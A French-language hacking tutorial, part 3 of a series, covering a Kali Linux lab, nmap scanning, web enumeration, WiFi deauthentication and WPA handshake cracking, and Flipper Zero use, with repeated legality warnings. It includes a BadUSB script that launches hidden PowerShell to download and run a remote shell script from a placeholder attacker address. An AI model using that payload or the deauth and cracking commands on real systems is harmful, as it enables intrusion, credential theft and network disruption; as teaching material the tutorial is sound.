Le Chemin du Hacker : Une Serie en 5 Parties
Partie 1 : Introduction → Partie 2 : Maitrise du Flipper → Partie 3 : Fondamentaux de Kali → Partie 4 : Exploitation → Partie 5 : L'Audit Complet
Dans les Parties 1 et 2, tu as clone des cartes, analyse des frequences radio et compris pourquoi la plupart de la "securite" n'est que du theatre. Tu as vu les vulnerabilites de l'exterieur. Maintenant tu entres a l'interieur et tu les vois du point de vue de l'attaquant.
Kali Linux est la distribution standard de l'industrie pour les tests de penetration. Elle est pre-chargee avec plus de 600 outils de securite. Ca peut paraitre ecrasant. La plupart des tutoriels te jettent dans le grand bain avec des commandes que tu ne comprends pas et sans contexte sur pourquoi elles sont importantes.
On fait les choses differemment. A la fin de cet article, tu auras un labo fonctionnel, tu comprendras la reconnaissance reseau a un niveau fondamental et tu captureras ton propre handshake WiFi. Chaque etape s'appuie sur la precedente.
Partie 1 : Construire Ton Laboratoire
Les testeurs de penetration professionnels n'executent pas Kali sur leur machine principale. Ils utilisent des environnements isoles qui peuvent etre reinitialises, snapshotes et detruits sans affecter leur systeme principal. Tu feras pareil.
Option A : Machine Virtuelle (Recommandee pour l'Apprentissage)
Une machine virtuelle te donne l'environnement d'apprentissage le plus sur. Tu peux faire des snapshots de ta progression, commettre des erreurs et revenir en arriere instantanement.
Ce Dont Tu Auras Besoin
- Machine hote : 16 Go+ de RAM, 50 Go+ d'espace disque libre, CPU moderne avec support de virtualisation
- Logiciel de virtualisation : VirtualBox (gratuit) ou VMware Workstation Player (gratuit pour usage personnel)
- Kali Linux : VM officielle pre-construite depuis kali.org
Projet : Configuration de la VM Kali
Temps : 30-45 minutes
Etapes :
- Telecharge l'image de la VM Kali pour ton hyperviseur (VirtualBox ou VMware)
- Extrais l'archive telechargee (7-Zip recommande pour Windows)
- Importe la VM dans ton hyperviseur
- Configure les ressources : 4 Go de RAM minimum (8 Go recommandes), 2+ coeurs CPU
- Active l'adaptateur reseau en mode "Bridged" pour un acces reseau complet
- Demarre la VM et connecte-toi avec les identifiants par defaut :
kali/kali - Ouvre le terminal et execute :
sudo apt update && sudo apt full-upgrade -y - Cree un snapshot nomme "Fresh Install" pour une recuperation facile
Verification du succes : Tu peux ouvrir un terminal, executer whoami et voir kali.
Option B : Materiel Dedie (Pour une Pratique Serieuse)
Une fois que tu es a l'aise avec Kali, le materiel dedie supprime la surcharge de la VM et permet un acces complet au materiel, ce qui est essentiel pour les tests sans fil.
Recommandations Materielles
| Option budget | ThinkPad X230/T430 d'occasion (100-150$), WiFi Intel remplace par Atheros AR9285 |
|---|---|
| Option moderne | Framework Laptop avec module WiFi compatible Linux |
| Capteur dedie | Raspberry Pi 5 4 Go avec adaptateur externe Alfa AWUS036ACH |
Pour l'instant, une VM est parfaite. Le materiel dedie devient important quand tu as besoin du mode moniteur pour les tests sans fil (couvert plus loin dans cet article).
Option C : USB Live (Zero Persistance)
Un USB live execute Kali directement sans installation. Tout disparait quand tu eteins. Utile pour tester sur differents materiels, mais tu perdras ton travail a chaque session sauf si tu crees une partition persistante.
bash# Create bootable USB on Linux/Mac
sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
# Replace sdX with your USB device (check with 'lsblk')
# On Windows: Use Rufus or balenaEtcherdd Detruit les Donnees
La commande dd ecrit directement sur le disque sans confirmation. Verifie trois fois le nom de ton peripherique. Ecrire sur le mauvais peripherique effacera completement ce disque.
Partie 2 : L'Etat d'Esprit Terminal
Avant de toucher aux outils de securite, tu dois etre a l'aise dans le terminal. Ce n'est pas optionnel. L'interface graphique existe dans Kali, mais le vrai travail se fait en ligne de commande.
Navigation Essentielle
bash# Know where you are
pwd # Print working directory
# Move around
cd /home/kali # Go to home directory
cd .. # Go up one level
cd - # Go to previous directory
# See what's here
ls # List files
ls -la # List all files with details
ls -lah # Human-readable sizes
# Read files
cat filename # Display entire file
less filename # Scrollable view (q to quit)
head -n 20 filename # First 20 lines
tail -f filename # Follow file in real-time (logs)Escalade de Privileges
Beaucoup d'outils de securite necessitent un acces root. Dans Kali, sudo te donne des privileges root temporaires.
bashsudo command # Run single command as root
sudo -i # Start root shell (be careful)
whoami # Check current user
id # Show user and group IDsRoot avec Responsabilite
Executer en tant que root signifie aucun filet de securite. Une faute de frappe comme rm -rf / detruira tout. Kali moderne empeche cette commande specifique, mais le principe reste : comprends ce que tu executes avant de l'executer.
Gestion des Processus
bashps aux # All running processes
top # Real-time process viewer
htop # Better process viewer (install if needed)
# Control processes
ctrl+c # Stop current process
ctrl+z # Suspend process
bg # Resume in background
fg # Bring to foreground
# Kill processes
kill PID # Graceful termination
kill -9 PID # Force kill (last resort)Commandes Reseau
baship a # Show network interfaces
ip route # Show routing table
ping -c 4 8.8.8.8 # Test connectivity
curl ifconfig.me # Your public IP
# DNS lookups
nslookup google.com
dig google.comProjet : Orientation Terminal
Temps : 15 minutes
Taches :
- Trouve ton adresse IP sur le reseau local avec
ip a - Identifie ta passerelle par defaut avec
ip route - Fais un ping a ta passerelle pour confirmer la connectivite
- Liste tous les fichiers dans
/etctries par date de modification :ls -lt /etc | head - Lis les 50 premieres lignes de
/etc/passwd:head -n 50 /etc/passwd
Objectif : Tu devrais pouvoir naviguer, verifier l'etat du reseau et lire des fichiers sans reflechir.
Partie 3 : Reconnaissance Reseau avec Nmap
Nmap (Network Mapper) est l'outil le plus important que tu apprendras. Il decouvre les hotes, identifie les services, detecte les systemes d'exploitation et cartographie la topologie du reseau. Tout le reste repose sur la sortie de nmap.
Ton Premier Scan
Scannons ton propre reseau. D'abord, identifie la plage de ton reseau :
bash# Find your local IP and subnet
ip a | grep inet
# Look for something like: inet 192.168.1.100/24
# The /24 means your network is 192.168.1.0-255bash# Basic discovery scan (your network only)
sudo nmap -sn 192.168.1.0/24
# What this does:
# -sn = ping scan (no port scanning, just host discovery)
# /24 = scan all 256 addresses in this subnetTu verras une sortie comme :
textNmap scan report for 192.168.1.1
Host is up (0.0025s latency).
MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)
Nmap scan report for 192.168.1.50
Host is up (0.0042s latency).
MAC Address: 11:22:33:44:55:66 (Another Manufacturer)Ce premier scan te dit : "Ces appareils existent sur mon reseau." Maintenant posons des questions plus profondes.
Detection de Services
Une fois que tu sais quels hotes existent, tu veux savoir quels services ils executent.
bash# Scan a single target for open ports and services
sudo nmap -sV 192.168.1.1
# -sV = Version detection (probe open ports for service info)Sortie courante :
textPORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1
80/tcp open http nginx 1.18.0
443/tcp open ssl/http nginx 1.18.0Detection du Systeme d'Exploitation
bash# Detect OS (requires root)
sudo nmap -O 192.168.1.1
# Combined scan: OS detection + service versions + default scripts
sudo nmap -A 192.168.1.1Comprendre les Etats des Ports
Nmap rapporte les ports dans plusieurs etats :
- open - L'application accepte activement les connexions. C'est ce que les attaquants recherchent.
- closed - Le port est accessible mais aucune application n'ecoute. L'hote est actif mais il n'y a rien.
- filtered - Un pare-feu ou filtre bloque la sonde. Impossible de determiner si c'est ouvert ou ferme.
- unfiltered - Le port est accessible mais nmap ne peut pas determiner s'il est ouvert ou ferme.
Types de Scan et Furtivite
bash# TCP Connect scan (default, noisy but reliable)
sudo nmap -sT target
# SYN scan (stealthier, default with root)
sudo nmap -sS target
# UDP scan (slow but important - many services use UDP)
sudo nmap -sU target
# Scan all 65535 ports (thorough but slow)
sudo nmap -p- target
# Scan specific ports
sudo nmap -p 22,80,443,8080 target
# Top 1000 common ports (default behavior)
sudo nmap targetMoteur de Scripts Nmap (NSE)
NSE etend nmap avec des scripts specialises pour la detection de vulnerabilites, l'enumeration de services et plus encore.
bash# Run default safe scripts
sudo nmap -sC target
# Check for vulnerabilities
sudo nmap --script vuln target
# SMB enumeration (Windows shares)
sudo nmap --script smb-enum-shares target
# HTTP enumeration
sudo nmap --script http-enum target
# List available scripts
ls /usr/share/nmap/scripts/ | head -20Projet : Cartographie Ton Reseau
Temps : 30 minutes
Prerequis : Connaitre la plage de ton reseau depuis ip a
- Decouvre tous les hotes :
sudo nmap -sn TON_RESEAU/24 - Liste les hotes decouverts et leurs adresses MAC
- Choisis ton routeur (generalement .1) et execute :
sudo nmap -sV -sC TON_ROUTEUR - Identifie tous les ports ouverts et services sur ton routeur
- Execute
sudo nmap -A TON_ORDINATEURpour voir ce que ta propre machine expose
Documente : Cree un fichier texte listant chaque appareil, son IP, MAC et services. C'est ta carte reseau.
Ne Scanne Que les Reseaux Qui T'Appartiennent
Scanner des reseaux sans autorisation est illegal dans la plupart des juridictions. Meme un simple scan nmap peut etre considere comme un acces non autorise. Limite-toi a ton propre reseau, ton propre equipement et les reseaux ou tu as une permission ecrite explicite.
Partie 4 : Reconnaissance Web
Ton scan nmap a probablement trouve des services HTTP (ports 80, 443, 8080). Voyons ce qui tourne la-dessus.
Whatweb : Identification Rapide de Services
bash# Identify web technologies
whatweb http://192.168.1.1Exemple de sortie :
texthttp://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
HTTPServer[nginx/1.18.0], IP[192.168.1.1],
Title[Router Admin], nginx[1.18.0]Nikto : Scanner de Vulnerabilites Web
bash# Scan for common web vulnerabilities
nikto -h http://192.168.1.1
# This checks for:
# - Outdated server software
# - Dangerous files/CGIs
# - Misconfigurations
# - Default credentialsEnumeration de Repertoires : Qu'est-ce Qui Est Cache ?
Les serveurs web ont souvent des repertoires non lies depuis la page principale : panneaux d'administration, fichiers de configuration, fichiers de sauvegarde.
bash# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txtDecouvertes courantes :
text/admin (Status: 301)
/backup (Status: 403)
/config (Status: 200)
/login (Status: 200)Emplacement des Wordlists
Kali inclut des wordlists completes dans /usr/share/wordlists/. Les repertoires les plus courants : dirb/, dirbuster/, rockyou.txt (mots de passe) et seclists/ (collection complete).
Projet : Audite l'Interface Web de Ton Routeur
Temps : 20 minutes
- Execute
whatweb http://IP_DE_TON_ROUTEURpour identifier le serveur - Execute
nikto -h http://IP_DE_TON_ROUTEURpour verifier les vulnerabilites - Execute
gobuster dir -u http://IP_DE_TON_ROUTEUR -w /usr/share/wordlists/dirb/small.txt - Visite les repertoires decouverts dans un navigateur
- Note tout panneau d'administration, numero de version ou decouverte interessante
Decouverte courante : Pages d'administration du routeur exposees avec des identifiants par defaut.
Partie 5 : Reconnaissance Sans Fil
C'est la que les choses deviennent interessantes. Les reseaux WiFi emettent en permanence, et avec les bons outils, tu peux capturer des handshakes d'authentification : l'echange chiffre qui se produit quand un appareil se connecte.
Exigences Materielles
Ton WiFi integre ne fonctionnera probablement pas pour ca. Tu as besoin d'un adaptateur qui supporte le mode moniteur et l'injection de paquets. Recommandes : Alfa AWUS036ACH (~50$) ou Alfa AWUS036ACM (~45$). Ils fonctionnent directement avec Kali.
Comprendre le Mode Moniteur
Le mode WiFi normal ("mode gere") ne recoit que les paquets adresses a ton appareil. Le mode moniteur capture tous les paquets a portee, le trafic de chaque appareil sur le canal.
bash# Check your wireless interfaces
iwconfig
# Look for your adapter (often wlan0 or wlan1)
# Kill interfering processes
sudo airmon-ng check kill
# Enable monitor mode
sudo airmon-ng start wlan0
# Your interface is now wlan0monScanner les Reseaux
bash# Start capturing wireless traffic
sudo airodump-ng wlan0mon
# You'll see:
# BSSID = Router MAC address
# PWR = Signal strength (higher = closer)
# CH = Channel
# ENC = Encryption (WPA2, WPA3, OPN)
# ESSID = Network name
# Press Ctrl+C to stopCe que tu vois, c'est chaque reseau WiFi a portee, leurs parametres de securite et souvent les appareils qui y sont connectes. C'est ce qu'un war driver voit en scannant les quartiers.
Capturer un Handshake
Quand un appareil se connecte a un reseau WPA2, il y a un handshake a quatre voies. Si tu captures ce handshake, tu peux tenter de cracker le mot de passe hors ligne.
bash# Focus on your target network (your own network!)
sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
# -c CHANNEL = Target's channel from previous scan
# --bssid = Target router's MAC address
# -w capture = Save to files starting with "capture"
# Now wait for a device to connect...
# Or force a reconnection (on YOUR network only):
# In a new terminal:
sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
# This sends 5 deauth packets, disconnecting clients
# They automatically reconnect, generating a handshakeQuand tu captures un handshake, airodump-ng affiche [ WPA handshake: XX:XX:XX:XX:XX:XX ] dans le coin superieur droit.
Les Attaques Deauth Sont Illegales
Envoyer des paquets de deauthentification a des reseaux qui ne t'appartiennent pas est un crime federal sous le Computer Fraud and Abuse Act (aux Etats-Unis) et des lois similaires ailleurs. Teste uniquement sur ton propre reseau. L'objectif est de comprendre la vulnerabilite, pas d'attaquer les autres.
Cracker le Handshake
Avec un handshake capture, tu peux tenter de cracker le mot de passe hors ligne avec une wordlist :
bash# Crack using a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# If the password is in the wordlist, you'll see:
# KEY FOUND! [ password123 ]
# For stronger passwords, use hashcat (GPU-accelerated)
# First, convert capture format:
cap2hccapx capture-01.cap capture.hccapx
# Then crack with hashcat:
hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txtVerification de Realite sur la Force des Mots de Passe
rockyou.txt contient plus de 14 millions de mots de passe issus de fuites de donnees reelles. Si ton mot de passe WiFi est "password123" ou "ete2024" ou le nom de ton chien, il est crackable en secondes. Un mot de passe aleatoire de plus de 12 caracteres prendrait des millions d'annees a cracker par force brute.
Projet : Teste la Securite de Ton WiFi
Temps : 45 minutes
Prerequis : Adaptateur WiFi externe avec support du mode moniteur
- Active le mode moniteur :
sudo airmon-ng start wlan0 - Scanne les reseaux :
sudo airodump-ng wlan0mon - Note le canal et BSSID de ton propre reseau
- Capture sur ton canal :
sudo airodump-ng -c CHANNEL --bssid TON_BSSID -w monwifi wlan0mon - Reconnecte un appareil a ton WiFi (ou utilise deauth sur TON reseau)
- Confirme la capture du handshake
- Teste contre rockyou.txt :
aircrack-ng -w /usr/share/wordlists/rockyou.txt monwifi-01.cap
Resultat : Si ton mot de passe a ete trouve, change-le immediatement pour quelque chose d'aleatoire et long (plus de 20 caracteres).
Partie 6 : Connecter Ton Flipper Zero
Tu te souviens de toutes ces captures de la Partie 2 ? Integrons-les a ton flux de travail Kali.
Transfert de Fichiers
bash# Connect Flipper via USB
# It appears as a mass storage device
# Mount if not auto-mounted
sudo mount /dev/sda1 /mnt/flipper
# Your captures are in:
/mnt/flipper/subghz/ # Sub-GHz captures
/mnt/flipper/nfc/ # NFC dumps
/mnt/flipper/infrared/ # IR captures
/mnt/flipper/lfrfid/ # 125kHz RFID
/mnt/flipper/badusb/ # BadUSB scriptsAnalyser les Dumps NFC
bash# Install libnfc tools
sudo apt install libnfc-bin mfoc mfcuk
# Flipper saves NFC as .nfc text format
# Convert to binary for analysis:
python3 flipper_nfc_to_mfd.py card.nfc card.mfd
# Analyze MIFARE Classic dump
hexdump -C card.mfd | lessAnalyse Sub-GHz
bash# Flipper's .sub files are text-based
cat garage_door.sub
# Contains:
# - Frequency (315MHz, 433MHz, etc.)
# - Protocol or RAW data
# - Timing information
# For deeper RF analysis, use:
# - Universal Radio Hacker (URH)
# - GNU Radio
# - rtl_433 (with SDR hardware)Developpement BadUSB
Cree des payloads BadUSB dans Kali, teste-les sur le Flipper :
bash# Flipper uses DuckyScript-compatible syntax
# Create payload on Kali:
cat > kali_connect.txt << 'EOF'
DELAY 1000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
ENTER
EOF
# Host the payload from Kali:
python3 -m http.server 8000
# Copy to Flipper's badusb folder
cp kali_connect.txt /mnt/flipper/badusb/Les Payloads BadUSB Sont Puissants
Ces scripts s'executent automatiquement une fois branches. Un payload malveillant pourrait installer des backdoors, voler des identifiants ou detruire des donnees en quelques secondes. Utilise-les uniquement sur tes propres machines pour les tests. Ne laisse jamais ton Flipper la ou quelqu'un d'autre pourrait le brancher.
Partie 7 : Documentation et Flux de Travail
Les testeurs de penetration professionnels ne font pas que lancer des outils. Ils documentent tout. Une bonne documentation separe les amateurs des professionnels.
Prise de Notes avec CherryTree
bash# Install CherryTree (hierarchical note-taking)
sudo apt install cherrytree
# Organize notes by:
# - Target/network
# - Reconnaissance
# - Enumeration
# - Vulnerabilities
# - Exploitation attempts
# - Post-exploitationSauvegarder la Sortie Nmap
bash# Save in all formats
sudo nmap -sV -sC -oA scan_results target
# Creates:
# scan_results.nmap (human-readable)
# scan_results.xml (parseable)
# scan_results.gnmap (greppable)Journalisation de Session
bash# Log entire terminal session
script session_$(date +%Y%m%d_%H%M%S).log
# Now every command and output is recorded
# Type 'exit' to stop loggingLe Chemin du Hacker
Une serie en 5 parties qui te fait passer de curieux a capable.
Partie 1 : Introduction Partie 2 : Maitrise du Flipper Partie 3 : Fondamentaux de Kali ✓ Partie 4 : Exploitation Partie 5 : Audit Complet
Checklist de la Partie 3
☐ Configuration du Lab : VM Kali fonctionnelle, mise a jour, snapshot sauvegarde
☐ Terminal : A l'aise avec la navigation, les permissions, le controle des processus
☐ Nmap : Reseau cartographie, services identifies, routeur scanne
☐ Recon Web : Interface web du routeur analysee avec whatweb/nikto
☐ Sans Fil : Mode moniteur active, reseaux scannes
☐ Handshake : Handshake WiFi personnel capture et teste
☐ Flipper : Fichiers transferes, flux de travail compris
☐ Documentation : Notes organisees, scans sauvegardes
Et Ensuite
Tu as construit ton laboratoire et appris la phase de reconnaissance. Tu peux decouvrir des hotes, identifier des services et capturer des handshakes sans fil. Tu comprends ce que les attaquants voient quand ils regardent un reseau.
Dans la Partie 4, on passe de la reconnaissance a l'exploitation. Tu apprendras :
- Metasploit Framework, le couteau suisse de l'exploitation
- Les flux de travail courants d'exploitation de vulnerabilites
- Les techniques de post-exploitation : ce qui se passe apres l'acces initial
- L'escalade de privileges : passer d'utilisateur normal a administrateur
- Le pivoting : utiliser un systeme compromis pour en attaquer d'autres
La reconnaissance te dit ou sont les portes. L'exploitation t'apprend a les traverser.
Tu as cartographie le territoire. Maintenant tu apprends a y naviguer. La Partie 4 te fait passer d'observateur a operateur.
On se retrouve dans la Partie 4.